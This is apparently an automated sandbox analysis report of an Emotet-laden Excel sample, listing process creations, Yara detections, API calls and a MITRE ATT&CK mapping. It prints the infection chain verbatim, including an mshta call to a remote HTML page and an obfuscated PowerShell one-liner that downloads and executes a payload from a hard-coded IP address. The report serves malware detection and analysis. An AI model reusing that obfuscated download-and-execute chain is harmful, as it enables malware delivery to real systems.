Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/qqw/aas/se.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/qqw/aas/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll AADD
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",ZbJdKnmHcqZ
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Klovgjl\kcktqpyucuj.sda",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",NNzCvXXtcqztdiA
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Xdubhjjihlzjbmcz\dcep.opz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",NblZwpRsgtK
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdywrgg\axwj.zob",DllRegisterServer

Source: Yara match	File source: 80_513972285.xls, type: SAMPLE
Source: Yara match	File source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_1003DAA7 cpuid

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,

Stealing of Sensitive Information

Yara detected Emotet

Source: Yara match	File source: 17.2.rundll32.exe.330000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.28f0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2890000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2280000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2340000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.3e0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2280000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2170000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2830000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.330000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2e10000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.27a0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.3150000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.23f0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2e00000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2080000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.28a0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.440000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.26d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.6c0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.26b0000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.630000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2840000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.3190000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2870000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.28c0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2160000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.4f0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2740000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.4f0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2340000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.26d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2950000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.470000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2890000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.23c0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.4f0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2dc0000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.4f0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.28f0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2950000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2740000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.23f0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.4c0000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.3160000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2e10000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.660000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2870000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2080000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2490000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.630000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2ed0000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.27c0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2e00000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.3190000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.2890000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.2700000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.2170000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564937807.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.672206410.00000000004C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.672542934.00000000023C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.675105738.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.509691983.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.672233162.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.671351696.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614263255.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.671971939.00000000003E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.514065714.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.613086830.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.672276729.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614545776.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510373196.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510260153.0000000002740000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.613891474.0000000002170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.613342038.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565506727.00000000027A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.567895594.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.675067684.0000000003190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614325624.0000000002950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614438771.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510667014.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565439888.0000000002701000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510425143.00000000028C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565551248.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565698294.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510010458.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.509922920.0000000002080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.514698978.0000000000471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510517753.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510176839.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.568150198.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.672589404.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.613442141.00000000006C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.675028637.0000000003161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.613971338.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565128790.0000000000661000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565466027.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614142809.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.674472849.0000000002891000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.672492274.0000000002340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614372731.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565096650.0000000000630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.613198246.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.675215559.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.450462581.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510060149.0000000002161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.617473555.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.617627799.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510140052.0000000002280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.671797398.0000000000330000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.510293000.00000000027C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.564986915.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565627998.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.509954832.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.616810767.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.674563401.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614197032.0000000002831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.568578862.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565801844.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.671423407.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565866582.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.614228489.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.565599896.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\ProgramData\QWER.dll, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	21 Scripting	1 Windows Service	1 Windows Service	1 Disable or Modify Tools	1 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	13 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Email Collection	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
